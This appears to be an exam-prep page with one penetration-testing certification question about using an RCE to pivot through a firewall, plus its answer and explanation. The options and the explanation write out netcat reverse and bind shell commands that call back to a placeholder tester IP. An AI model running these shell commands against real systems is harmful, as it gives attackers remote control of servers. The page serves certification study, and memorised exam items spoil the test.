PT0-003 Question #217: Real Exam Question with Answer & Explanation
The correct answer is D: /bin/sh -c 'nc <pentester_ip> 443'.
Question
A penetration tester finds an unauthenticated RCE vulnerability on a web server and wants to use it to enumerate other servers on the local network. The web server is behind a firewall that allows only an incoming connection to TCP ports 443 and 53 and unrestricted outbound TCP connections. The target web server is https://target.comptia.org. Which of the following should the tester use to perform the task with the fewest web requests?
Options
- A. nc -e /bin/sh -lp 53
- B. /bin/sh -c 'nc -l -p 443'
- C. nc -e /bin/sh <pentester_ip> 53
- D. /bin/sh -c 'nc <pentester_ip> 443'
Explanation
The tester needs to pivot from the compromised web server while bypassing firewall restrictions:
- Inbound traffic only on TCP 443 (HTTPS) and TCP 53 (DNS)
- Unrestricted outbound traffic

Reverse shell using TCP 443: This command initiates an outbound connection to the pentester's machine on port 443, which is allowed by the firewall.

/bin/sh -c 'nc <pentester_ip> 443 -e /bin/sh'

The pentester listens on TCP 443 and receives the shell from the target.